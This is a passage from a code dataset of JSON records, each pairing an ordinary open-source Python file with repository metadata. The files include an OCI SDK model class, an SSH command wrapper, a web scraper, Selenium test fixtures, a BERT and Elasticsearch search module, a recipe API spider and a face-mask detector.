{"api_name": "sys.stdout", "line_number": 201, "usage_type": "attribute"}, {"api_name": "sys.stdout.flush", "line_number": 202, "usage_type": "call"}, {"api_name": "sys.stdout", "line_number": 202, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path", "line_number": 228, "usage_type": "attribute"}, {"api_name": "os.path.split", "line_number": 228, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 230, "usage_type": "call"}, {"api_name": "os.path", "line_number": 230, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 231, "usage_type": "call"}, {"api_name": "os.path", "line_number": 231, "usage_type": "attribute"}, {"api_name": "pickle.dump", "line_number": 235, "usage_type": "call"}]} +{"seq_id": "31582441159", "text": "from oci.util import formatted_flat_dict, NONE_SENTINEL, value_allowed_none_or_none_sentinel # noqa: F401\nfrom oci.decorators import init_model_state_from_kwargs\n\n\n@init_model_state_from_kwargs\nclass SecureAccessControlRule(object):\n \"\"\"\n The access control rule for SECURE_ACCESS network type selection.\n \"\"\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"IP_ADDRESS\"\n IP_NOTATION_IP_ADDRESS = \"IP_ADDRESS\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"CIDR\"\n IP_NOTATION_CIDR = \"CIDR\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"VCN\"\n IP_NOTATION_VCN = \"VCN\"\n\n #: A constant which can be used with the ip_notation property of a SecureAccessControlRule.\n #: This constant has a value of \"VCN_OCID\"\n IP_NOTATION_VCN_OCID = \"VCN_OCID\"\n\n def __init__(self, **kwargs):\n \"\"\"\n Initializes a new SecureAccessControlRule object with values from keyword arguments.\n The following keyword arguments are supported (corresponding to the getters/setters of this class):\n\n :param ip_notation:\n The value to assign to the ip_notation property of this SecureAccessControlRule.\n Allowed values for this property are: \"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n :type ip_notation: str\n\n :param value:\n The value to assign to the value property of this SecureAccessControlRule.\n :type value: str\n\n :param vcn_ips:\n The value to assign to the vcn_ips property of this SecureAccessControlRule.\n :type vcn_ips: str\n\n \"\"\"\n self.swagger_types = {\n 'ip_notation': 'str',\n 'value': 'str',\n 'vcn_ips': 'str'\n }\n\n self.attribute_map = {\n 'ip_notation': 'ipNotation',\n 'value': 'value',\n 'vcn_ips': 'vcnIps'\n }\n\n self._ip_notation = None\n self._value = None\n self._vcn_ips = None\n\n @property\n def ip_notation(self):\n \"\"\"\n **[Required]** Gets the ip_notation of this SecureAccessControlRule.\n The type of IP notation.\n\n Allowed values for this property are: \"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\", 'UNKNOWN_ENUM_VALUE'.\n Any unrecognized values returned by a service will be mapped to 'UNKNOWN_ENUM_VALUE'.\n\n\n :return: The ip_notation of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._ip_notation\n\n @ip_notation.setter\n def ip_notation(self, ip_notation):\n \"\"\"\n Sets the ip_notation of this SecureAccessControlRule.\n The type of IP notation.\n\n\n :param ip_notation: The ip_notation of this SecureAccessControlRule.\n :type: str\n \"\"\"\n allowed_values = [\"IP_ADDRESS\", \"CIDR\", \"VCN\", \"VCN_OCID\"]\n if not value_allowed_none_or_none_sentinel(ip_notation, allowed_values):\n ip_notation = 'UNKNOWN_ENUM_VALUE'\n self._ip_notation = ip_notation\n\n @property\n def value(self):\n \"\"\"\n **[Required]** Gets the value of this SecureAccessControlRule.\n The associated value of the selected IP notation.\n\n\n :return: The value of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._value\n\n @value.setter\n def value(self, value):\n \"\"\"\n Sets the value of this SecureAccessControlRule.\n The associated value of the selected IP notation.\n\n\n :param value: The value of this SecureAccessControlRule.\n :type: str\n \"\"\"\n self._value = value\n\n @property\n def vcn_ips(self):\n \"\"\"\n Gets the vcn_ips of this SecureAccessControlRule.\n A comma-separated IP or CIDR address for VCN OCID IP notation selection.\n\n\n :return: The vcn_ips of this SecureAccessControlRule.\n :rtype: str\n \"\"\"\n return self._vcn_ips\n\n @vcn_ips.setter\n def vcn_ips(self, vcn_ips):\n \"\"\"\n Sets the vcn_ips of this SecureAccessControlRule.\n A comma-separated IP or CIDR address for VCN OCID IP notation selection.\n\n\n :param vcn_ips: The vcn_ips of this SecureAccessControlRule.\n :type: str\n \"\"\"\n self._vcn_ips = vcn_ips\n\n def __repr__(self):\n return formatted_flat_dict(self)\n\n def __eq__(self, other):\n if other is None:\n return False\n\n return self.__dict__ == other.__dict__\n\n def __ne__(self, other):\n return not self == other\n", "repo_name": "oracle/oci-python-sdk", "sub_path": "src/oci/data_flow/models/secure_access_control_rule.py", "file_name": "secure_access_control_rule.py", "file_ext": "py", "file_size_in_byte": 4820, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 345, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oci.util.value_allowed_none_or_none_sentinel", "line_number": 89, "usage_type": "call"}, {"api_name": "oci.util.formatted_flat_dict", "line_number": 142, "usage_type": "call"}, {"api_name": "oci.decorators.init_model_state_from_kwargs", "line_number": 5, "usage_type": "name"}]} +{"seq_id": "38246114623", "text": "from __future__ import annotations\n\nfrom logging import Logger, getLogger\nfrom types import TracebackType\nfrom typing import Any, Optional, Type\n\nimport asyncssh\nfrom asyncssh import (\n ProcessError,\n SSHClientConnection,\n SSHCompletedProcess,\n SSHKnownHosts,\n)\n\n_LOGGER = getLogger(__name__)\n\nfrom ._command_line import CommandLine\n\n\nclass SshCommandLine(CommandLine):\n \"\"\"SSH-based command line used to send commands to the device.\"\"\"\n\n def __init__(\n self,\n *,\n host: str,\n port: int,\n host_key: str,\n username: str,\n logger: Optional[Logger] = None,\n ) -> None:\n super().__init__()\n self._host = host\n self._port = port\n self._host_key = host_key\n self._username = username\n if logger is None:\n logger = _LOGGER\n self._logger = logger\n self._conn: Optional[SSHClientConnection] = None\n\n async def run(self, command: str, **kwargs: Any) -> str:\n \"\"\"Run command and wait for the response.\"\"\"\n if self._conn is None:\n raise RuntimeError(\"Call __aenter__ before you issue a command\")\n try:\n process: SSHCompletedProcess = await self._conn.run(command, check=True)\n except ProcessError as exc:\n self._logger.debug(f\"stdout:\\n{exc.stdout}\")\n self._logger.debug(f\"stderr:\\n{exc.stderr}\")\n raise\n response = process.stdout\n assert isinstance(response, str)\n return response\n\n @property\n def _known_hosts(self) -> SSHKnownHosts:\n data = f\"{self._host} {self._host_key}\\n\"\n return SSHKnownHosts(data)\n\n async def __aenter__(self) -> SshCommandLine:\n conn = asyncssh.connect(\n self._host,\n self._port,\n known_hosts=self._known_hosts,\n username=self._username,\n )\n self._conn = await conn.__aenter__()\n return self\n\n async def __aexit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_value: Optional[BaseException],\n traceback: Optional[TracebackType],\n ) -> None:\n assert self._conn is not None\n await self._conn.__aexit__(exc_type, exc_value, traceback)\n", "repo_name": "sbtinstruments/wright", "sub_path": "wright/command_line/_ssh_command_line.py", "file_name": "_ssh_command_line.py", "file_ext": "py", "file_size_in_byte": 2243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.getLogger", "line_number": 15, "usage_type": "call"}, {"api_name": "_command_line.CommandLine", "line_number": 20, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 30, "usage_type": "name"}, {"api_name": "logging.Logger", "line_number": 30, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 40, "usage_type": "name"}, {"api_name": "asyncssh.SSHClientConnection", "line_number": 40, "usage_type": "name"}, {"api_name": "typing.Any", "line_number": 42, "usage_type": "name"}, {"api_name": "asyncssh.SSHCompletedProcess", "line_number": 47, "usage_type": "name"}, {"api_name": "asyncssh.ProcessError", "line_number": 48, "usage_type": "name"}, {"api_name": "asyncssh.SSHKnownHosts", "line_number": 59, "usage_type": "call"}, {"api_name": "asyncssh.SSHKnownHosts", "line_number": 57, "usage_type": "name"}, {"api_name": "asyncssh.connect", "line_number": 62, "usage_type": "call"}, {"api_name": "typing.Optional", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Type", "line_number": 73, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 74, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 75, "usage_type": "name"}, {"api_name": "types.TracebackType", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "9668506799", "text": "import json\nimport networkx as nx\nfrom pyvis.network import Network\n\n# Load the word paths from the json file\nwith open(\"word_paths.json\", 'r') as f:\n word_paths = json.load(f)\n\n# choose 100 words\nword_paths = {k: word_paths[k] for k in list(word_paths)[:100]}\n\n# Create a directed graph\nG = nx.DiGraph()\n\n# Add nodes and edges to the graph\nfor word, paths in word_paths.items():\n for path_word in paths:\n G.add_edge(word, path_word)\n\n# Convert the NetworkX graph into a PyVis network\npyvis_graph = Network(notebook=True, select_menu=True)\npyvis_graph.from_nx(G)\n\n# Provide the nodes with labels\nfor node in pyvis_graph.nodes:\n node[\"title\"] = f\"Word: {node['id']}\"\n node[\"label\"] = node[\"id\"]\n\n\npyvis_graph.show_buttons(filter_=['physics']) \n\n#turn physics off\npyvis_graph.toggle_physics(False)\n\n# Save the graph to an HTML file\npyvis_graph.show(\"word_graph.html\")\n", "repo_name": "samshapley/SemanticGPT", "sub_path": "semantic_network/pyvis_html_network.py", "file_name": "pyvis_html_network.py", "file_ext": "py", "file_size_in_byte": 885, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "json.load", "line_number": 7, "usage_type": "call"}, {"api_name": "networkx.DiGraph", "line_number": 13, "usage_type": "call"}, {"api_name": "pyvis.network.Network", "line_number": 21, "usage_type": "call"}]} +{"seq_id": "5595400265", "text": "# encoding: utf-8\n\nfrom urllib.request import urlopen\nfrom bs4 import BeautifulSoup\nfrom config import *\nimport os, re\n\n\ndef get_first_level_title(div):\n \"\"\"\n 遍历一级标题,保存标题及链接\n \"\"\"\n global contents, current_level\n for li in div.find_all(\"li\", {\"class\": \"toctree-l1\"}):\n item = {}\n # 1. 标题\n item[\"chapter\"] = li.a.string\n # 2. 添加层级,方便排序\n href = li.a[\"href\"]\n if href == COPYRIGHT_HREF or href == PREFACE_HREF:\n item[\"level\"] = (0, 0)\n current_level = 0\n else:\n current_level += 1\n item[\"level\"] = (current_level, 0)\n # 3. 章节页面url\n item[\"url\"] = BASE_URL + href\n contents.append(item)\n\n # 获取子章节标题\n get_second_level_title(li.find_all(\"li\", {\"class\": \"toctree-l2\"}))\n\n\ndef get_second_level_title(lis):\n \"\"\"\n 遍历子章节标题,保存标题及链接\n \"\"\"\n global contents, current_level\n sub_level = 1\n for li in lis:\n item = {}\n # 1. 标题\n item[\"chapter\"] = li.a.string\n # 2. 添加层级,方便排序\n item[\"level\"] = (current_level, sub_level)\n sub_level += 1\n # 3. 章节页面url\n item[\"url\"] = BASE_URL + li.a[\"href\"]\n contents.append(item)\n\n\ndef save_to_html(item):\n # 0. 获取html内容\n html = urlopen(item[\"url\"])\n bs_obj = BeautifulSoup(html, \"html.parser\")\n\n # 1. 获取内容主体\n rst_content = bs_obj.find(\"div\", {\"class\": \"rst-content\"})\n # 2. 删除导航及底部信息\n rst_content.find(\"div\", {\"role\": \"navigation\"}).decompose()\n rst_content.footer.decompose()\n\n # 3. 如果是子章节,将H1替换为H2,将H2替换为H3\n level = item[\"level\"][0]\n sub_level = item[\"level\"][1]\n\n if level != 0:\n for h2 in rst_content.find_all(\"h2\"):\n h2.name = \"h3\"\n for h1 in rst_content.find_all(\"h1\"):\n h1.name = \"h2\"\n\n # 4. 加上头尾\n body_part = rst_content.prettify()\n if sub_level != 0:\n header_part = HTML_HEADER % bs_obj.h2.get_text()\n else:\n header_part = HTML_HEADER % bs_obj.h1.get_text()\n footer_part = HTML_FOOTER\n\n # 保存到文件\n # return header_part + body_part + footer_part\n file_name = correct_file_name(str(level) + \"-\" + str(sub_level) + \"-\" + item[\"chapter\"] + \".html\")\n file_name = DOWNLOAD_PATH + os.sep + file_name\n with open(os.path.abspath(file_name), \"w\", encoding=\"utf-8\") as f:\n f.write(header_part + body_part + footer_part)\n\n\ndef make_download_dir():\n if os.path.exists(DOWNLOAD_PATH) == False:\n os.makedirs(DOWNLOAD_PATH)\n\n\ndef correct_file_name(file_name):\n rex = re.compile(r'[\\\\/:*?\"<>|\\r\\n]+')\n invalid_strs = rex.findall(file_name)\n if invalid_strs:\n for invalid_str in invalid_strs:\n file_name = file_name.replace(invalid_str, '_')\n return file_name\n\n# def write_to_html()\n\nif __name__ == \"__main__\":\n\n # item = {\n # \"chapter\": \"1.1 解压序列赋值给多个变量\",\n # \"url\": \"http://python3-cookbook.readthedocs.io/zh_CN/latest/c01/p01_unpack_sequence_into_separate_variables.html\",\n # \"level\": (1, 1),\n # }\n # make_download_dir()\n # save_to_html(item)\n make_download_dir()\n contents = []\n html = urlopen(CONTENTS_URL)\n bs_obj = BeautifulSoup(html, \"html.parser\")\n get_first_level_title(bs_obj.find(id=\"python-cookbook-3rd-edition-documentation\"))\n\n count = 1\n for item in contents:\n print(item[\"level\"], item[\"chapter\"], item[\"url\"], sep=\" : \")\n if item[\"level\"][0] == 0 or item[\"level\"][0] == 16:\n save_to_html(item)\n count += 1\n", "repo_name": "icescut/Crawl-Python-Cookbook", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 3737, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 55, "usage_type": "call"}, {"api_name": "os.sep", "line_number": 84, "usage_type": "attribute"}, {"api_name": "os.path.abspath", "line_number": 85, "usage_type": "call"}, {"api_name": "os.path", "line_number": 85, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 90, "usage_type": "call"}, {"api_name": "os.path", "line_number": 90, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 91, "usage_type": "call"}, {"api_name": "re.compile", "line_number": 95, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 115, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 116, "usage_type": "call"}]} +{"seq_id": "18901794784", "text": "import pytest\nfrom selenium import webdriver\n\nfrom tests.test_news import TestOne\nfrom utilities.BaseClass import BaseClass\n\ndriver = None\n\n\ndef pytest_addoption(parser): # cmd: py.test --browser_name chrome --window_size desktop\n parser.addoption(\"--browser_name\", action=\"store\", default=\"chrome\")\n # parser.addoption(\"--window_size\", action=\"store\", default=\"desktop\")\n\n\n@pytest.fixture(scope=\"class\")\ndef setup(request):\n global driver\n browser_name = request.config.getoption(\"--browser_name\")\n if browser_name == \"chrome\":\n driver = webdriver.Chrome(executable_path=\"C:\\\\chromedriver.exe\") # local path! (change accordingly)\n elif browser_name == \"firefox\":\n driver = webdriver.Firefox(executable_path=\"C:\\\\geckodriver.exe\") # local path!\n elif browser_name == \"IE\":\n driver = webdriver.Ie(executable_path=\"C:\\\\IEDriverServer.exe\") # local path!\n # other possible browsers: safari, microsoft edge, opera etc.\n driver.get(\"https://finansavisen.no/\")\n\n # # ask Filip how to implement this the 'right' way\n # testOne = TestOne()\n # window_size = request.config.getoption(\"--window_size\")\n # if window_size == \"desktop\":\n # driver.maximize_window()\n # testOne.test_newsDesktop()\n # elif window_size == \"tablet\":\n # driver.set_window_size(1366, 768)\n # # upon doing some manual checks, tablet resolutions share same class names with desktop resolutions\n # testOne.test_newsDesktop()\n # elif window_size == \"mobile\":\n # driver.set_window_size(360, 640)\n # testOne.test_newsMobile()\n\n request.cls.driver = driver\n yield\n driver.close()\n\n\n# pasted code for screenshots when tests fail\n# commented cause not really needed, hard to tell from screenshots what went wrong in this case\n\n# @pytest.mark.hookwrapper\n# def pytest_runtest_makereport(item):\n# \"\"\"\n# Extends the PyTest Plugin to take and embed screenshot in html report, whenever test fails.\n# :param item:\n# \"\"\"\n# pytest_html = item.config.pluginmanager.getplugin('html')\n# outcome = yield\n# report = outcome.get_result()\n# extra = getattr(report, 'extra', [])\n#\n# if report.when == 'call' or report.when == \"setup\":\n# xfail = hasattr(report, 'wasxfail')\n# if (report.skipped and xfail) or (report.failed and not xfail):\n# file_name = report.nodeid.replace(\"::\", \"_\") + \".png\"\n# _capture_screenshot(file_name)\n# if file_name:\n# html = '<div><img src=\"%s\" alt=\"screenshot\" style=\"width:304px;height:228px;\" ' \\\n# 'onclick=\"window.open(this.src)\" align=\"right\"/></div>' % file_name\n# extra.append(pytest_html.extras.html(html))\n# report.extra = extra\n#\n# def _capture_screenshot(name):\n# driver.get_screenshot_as_file(name)\n", "repo_name": "lucijacovic/qa-task", "sub_path": "tests/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 2868, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "selenium.webdriver.Chrome", "line_number": 20, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 20, "usage_type": "name"}, {"api_name": "selenium.webdriver.Firefox", "line_number": 22, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 22, "usage_type": "name"}, {"api_name": "selenium.webdriver.Ie", "line_number": 24, "usage_type": "call"}, {"api_name": "selenium.webdriver", "line_number": 24, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 15, "usage_type": "call"}]} +{"seq_id": "12899325921", "text": "import re\nimport numpy as np\nimport torch\nimport torch.nn.functional as F\nfrom app import tokenizer,model\nfrom app import pca, min_val, max_val\nfrom sklearn.preprocessing import MinMaxScaler\nfrom app import es\n\nmax_length = 40 # bert ���子向量的最大值\ninput_length = 23 # torch.Size([43486, 23, 768]) 这个要跟中间的23长度对应(第四个代码框),因为description里面长度影响结果\nn_components = 900 #PCA降维后的维度\nmovie_num = 43449 # movie number\nindex_name = \"movie_es_data\"\n# input_sentence means the description user input\n# host is:'http://localhost:9200'\n\n# 需要保存三个文件 第一个是pca矩阵 第二个是normalized的最大值最小值数组\n\ndef remove_punctuation(text):\n cleaned_text = re.sub(r'[^\\w\\s]', '', text)\n cleaned_text = re.sub(r'[^\\x00-\\x7F]+', '', cleaned_text) # Remove Chinese garbled characters\n return cleaned_text\n\ndef get_normalized_data(input_sentence):\n input_tokens = tokenizer.encode_plus(\n input_sentence,\n truncation=True,\n max_length=input_length - 2, # Consider adding the length of the start and end tags\n padding='max_length',\n return_tensors='pt'\n )\n\n input_ids = input_tokens['input_ids'] # Enter the encoding of the sentence\n\n # Add start and end tags to the beginning and end of the input sentence\n if len(input_ids) < input_length:\n input_ids = torch.cat(\n [torch.tensor([tokenizer.cls_token_id]), input_ids.squeeze(), torch.tensor([tokenizer.sep_token_id])])\n # attention_mask = torch.cat([torch.tensor([1]), attention_mask.squeeze(), torch.tensor([1])])\n\n # If the length of the input sentence is less than input length, fill it in\n if len(input_ids) < input_length:\n num_pad_tokens = input_length - len(input_ids)\n input_ids = F.pad(input_ids, (0, num_pad_tokens), value=tokenizer.pad_token_id)\n # attention_mask = F.pad(attention_mask, (0, num_pad_tokens), value=0)\n\n # Converts the input to a tensor and gets an embedded representation\n input_ids = input_ids.unsqueeze(0)\n # attention_mask = attention_mask.unsqueeze(0)\n\n with torch.no_grad():\n input_outputs = model(input_ids)\n input_embedding = input_outputs.last_hidden_state.squeeze(0)\n\n embedding_np = input_embedding.detach().numpy().reshape(-1).tolist()\n\n # Convert embedding_np to a NumPy array\n embedding_np_array = np.array(embedding_np)\n\n # The transformation was performed using the previously trained PCA model\n input_pca = pca.transform(embedding_np_array.reshape(1, -1))\n\n # Use MinMaxScaler for standardization\n scaler2 = MinMaxScaler(feature_range=(-1, 1))\n scaler2.data_min_ = min_val\n scaler2.data_max_ = max_val\n\n normalized_data = (input_pca - min_val) / (max_val - min_val)\n\n # Convert the result to a 1x900 list\n normalized_data_list = np.squeeze(normalized_data).tolist()\n\n return normalized_data_list\n\ndef es_search_bert(query_vector, k):\n query = {\n \"query\": {\n \"script_score\": {\n \"query\": {\"match_all\": {}},\n \"script\": {\n \"source\": \"cosineSimilarity(params.query_vector, 'sentenceVectors') + 1.0\",\n \"params\": {\"query_vector\": query_vector}\n }\n }\n },\n \"size\": k\n }\n results_all = es.search(index=index_name, body=query)\n results_movieId = []\n if results_all['hits']['total']['value'] > 0:\n for hit in results_all['hits']['hits']:\n movie_id = hit['_source']['movieId']\n movie_name = hit['_source']['movieName']\n similarity = hit['_score']\n results_movieId.append(movie_id)\n print(f\"Movie ID: {movie_id} - Movie Name: {movie_name} - Similarity: {similarity}\")\n else:\n print(\"No movies found matching the input keywords.\")\n return results_movieId\n", "repo_name": "movieRecommendHKU/Search-module", "sub_path": "flaskProject/sentenceSearch.py", "file_name": "sentenceSearch.py", "file_ext": "py", "file_size_in_byte": 3914, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "re.sub", "line_number": 21, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 22, "usage_type": "call"}, {"api_name": "app.tokenizer.encode_plus", "line_number": 26, "usage_type": "call"}, {"api_name": "app.tokenizer", "line_number": 26, "usage_type": "name"}, {"api_name": "torch.cat", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 39, "usage_type": "call"}, {"api_name": "app.tokenizer.cls_token_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "app.tokenizer", "line_number": 39, "usage_type": "name"}, {"api_name": "app.tokenizer.sep_token_id", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.nn.functional.pad", "line_number": 45, "usage_type": "call"}, {"api_name": "torch.nn.functional", "line_number": 45, "usage_type": "name"}, {"api_name": "app.tokenizer.pad_token_id", "line_number": 45, "usage_type": "attribute"}, {"api_name": "app.tokenizer", "line_number": 45, "usage_type": "name"}, {"api_name": "torch.no_grad", "line_number": 52, "usage_type": "call"}, {"api_name": "app.model", "line_number": 53, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 59, "usage_type": "call"}, {"api_name": "app.pca.transform", "line_number": 62, "usage_type": "call"}, {"api_name": "app.pca", "line_number": 62, "usage_type": "name"}, {"api_name": "sklearn.preprocessing.MinMaxScaler", "line_number": 65, "usage_type": "call"}, {"api_name": "app.min_val", "line_number": 66, "usage_type": "name"}, {"api_name": "app.max_val", "line_number": 67, "usage_type": "name"}, {"api_name": "app.min_val", "line_number": 69, "usage_type": "name"}, {"api_name": "app.max_val", "line_number": 69, "usage_type": "name"}, {"api_name": "numpy.squeeze", "line_number": 72, "usage_type": "call"}, {"api_name": "app.es.search", "line_number": 89, "usage_type": "call"}, {"api_name": "app.es", "line_number": 89, "usage_type": "name"}]} +{"seq_id": "654669276", "text": "import numpy as np\nimport os\nimport json\nimport requests\nfrom tqdm import tqdm\nimport time\nfrom random import randint\n\ndef get_url(url, retry=True, time_out=3, n=3):\n\tif n==0:\n\t\treturn None\n\ttry:\n\t\treturn requests.get(url, timeout=time_out).json()\n\texcept Exception:\n\t\tprint(\"[Error] Raised Exception on {}..\".format(url))\n\t\tif retry:\n\t\t\tprint(\"[Error] Retrying on {}\".format(url))\n\t\t\treturn get_url(url, retry, time_out, n=n-1)\n\t\telse:\n\t\t\traise Exception\n\napi_id = 'INSERT_API_ID'\napi_key = 'INSERT_API_KEY'\ndata_folder = './data/lists/'\nres_folder = './data/recipes/'\n\nfor cuisine_result_filename in os.listdir(data_folder):\n\tif not cuisine_result_filename.split('.')[-1] == 'json':\n\t\tcontinue\n\tfile_path = os.path.join(data_folder, cuisine_result_filename)\n\tprint('[Info] Reading results from {}'.format(cuisine_result_filename))\n\twith open(file_path) as jf:\n\t\tresults = json.load(jf)['matches']\n\n\tfor result in tqdm(results):\n\t\tid_ = result['id']\n\t\turl = 'http://api.yummly.com/v1/api/recipe/{}?_app_id={}&_app_key={}'.format(id_, api_id, api_key)\n\t\tjson_file = os.path.join(res_folder, id_+'.json')\n\t\tif os.path.exists(json_file):\n\t\t\tcontinue\n\t\trecipe_info = get_url(url)\n\t\tif recipe_info is None:\n\t\t\tcontinue\n\t\tif not os.path.exists(res_folder):\n\t\t\tos.mkdir(res_folder)\n\t\twith open(json_file, 'w') as jf:\n\t\t\tjson.dump(recipe_info, jf)\n\t\ttime.sleep(randint(0,3))", "repo_name": "alialamiidrissi/ADA_Course_Project", "sub_path": "Project/spider2.py", "file_name": "spider2.py", "file_ext": "py", "file_size_in_byte": 1367, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 13, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 33, "usage_type": "call"}, {"api_name": "tqdm.tqdm", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path", "line_number": 39, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 44, "usage_type": "call"}, {"api_name": "os.path", "line_number": 44, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 47, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 48, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 48, "usage_type": "call"}]} +{"seq_id": "12016435636", "text": "import cv2\nfrom fastai.vision import *\nimport torch\n\n\n#face_cascade=cv2.CascadeClassifier(\"./app/model/haarcascade_frontalface_default.xml\")\n#ds_factor=0.75\n#face_mask_learn = load_learner('./app/model')\nclass FaceBio():\n def __init__(self):\n # self.device = torch.device('cpu')\n\n # self.mtcnn = MTCNN(\n # image_size=160, margin=0, min_face_size=20,\n # thresholds=[0.6, 0.7, 0.7], factor=0.709, post_process=True,\n # device=self.device\n # )\n\n #self.resnet = InceptionResnetV1(pretrained='vggface2').eval().to(self.device)\n self.face_cascade=cv2.CascadeClassifier(\"./app/model/haarcascade_frontalface_default.xml\")\n self.face_mask_learn = load_learner('./app/model')\n\n\n def detect_faces(self, image):\n '''Detect face in an image'''\n \n faces_list = []\n\n t = torch.tensor(np.ascontiguousarray(np.flip(image, 2)).transpose(2,0,1)).float()/255\n img = Image(t) # fastai.vision.Image, not PIL.Image\n pred_class, pred_idx, outputs = self.face_mask_learn.predict(img)\n \n if(str(pred_class) == 'mask'):\n color = (0, 255, 0)\n label = True\n else:\n color = (0, 0, 255)\n label = False\n\n #faces, probs = self.mtcnn.detect(image)\n\n # Convert the test image to gray scale (opencv face detector expects gray images)\n gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n # Detect multiscale images (some images may be closer to camera than others)\n # result is a list of faces\n faces = self.face_cascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5);\n\n # If not face detected, return empty list \n if len(faces) == 0:\n #face_dict['label'] = label\n #faces_list.append(face_dict)\n return faces_list, label\n else:\n for i in range(0, len(faces)):\n (x, y, w, h) = faces[i]\n #print(x, y, w, h)\n face_dict = {}\n face_dict['face'] = gray[int(y):int(y) + int(w), int(x):int(x) + int(h)]\n face_dict['rect'] = (x, y, w, h)\n #face_dict['label'] = label\n #face_dict['color'] = color\n faces_list.append(face_dict)\n\n # Return the face image area and the face rectangle\n return faces_list, label\n\n def draw_frame(self, image, rect):\n (x, y, w, h) = rect\n cv2.rectangle(image, (x, y), (x + w, y + h), (0, 255, 255), 2) \n #cv2.putText(image, label, (x, y), cv2.FONT_HERSHEY_SIMPLEX, 0.75, color, 2)\n\n", "repo_name": "aastroza/Face-Mask-Detector", "sub_path": "app/faceDetector.py", "file_name": "faceDetector.py", "file_ext": "py", "file_size_in_byte": 2628, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 3, "dataset": "github-code", "pt": "52", "api": [{"api_name": "cv2.CascadeClassifier", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.tensor", "line_number": 29, "usage_type": "call"}, {"api_name": "cv2.cvtColor", "line_number": 43, "usage_type": "call"}, {"api_name": "cv2.COLOR_BGR2GRAY", "line_number": 43, "usage_type": "attribute"}, {"api_name": "cv2.rectangle", "line_number": 70, "usage_type": "call"}]} +{"seq_id": "39250445043", "text": "from django.http import response\nfrom blogs_app.views import *\nfrom django.test import TestCase\nfrom django.urls import reverse\nfrom django.contrib.auth import authenticate, login, get_user, get_user_model\nfrom django.contrib.auth.models import User\nfrom django.test import Client\nfrom blogs_app.models import BlogpostModel\nfrom django.contrib.auth.models import Permission\n\nclass BlogCreationViewTest(TestCase):\n \"\"\"Test Blog creation test view\n\n Required setting permission -- can_post_blogpost\"\"\"\n\n def setUp(self):\n \"\"\"Sets test data:\n creates:\n self.user -- User object\n self.blog_data -- dictionary, contains data for creating new blogpost\n self.img_data -- string, contains image address for image file\"\"\"\n self.url = '/create_blog/'\n self.user = User.objects.create(username=\"testuser\")\n self.user.set_password(\"testpassword\")\n self.user.save()\n user = 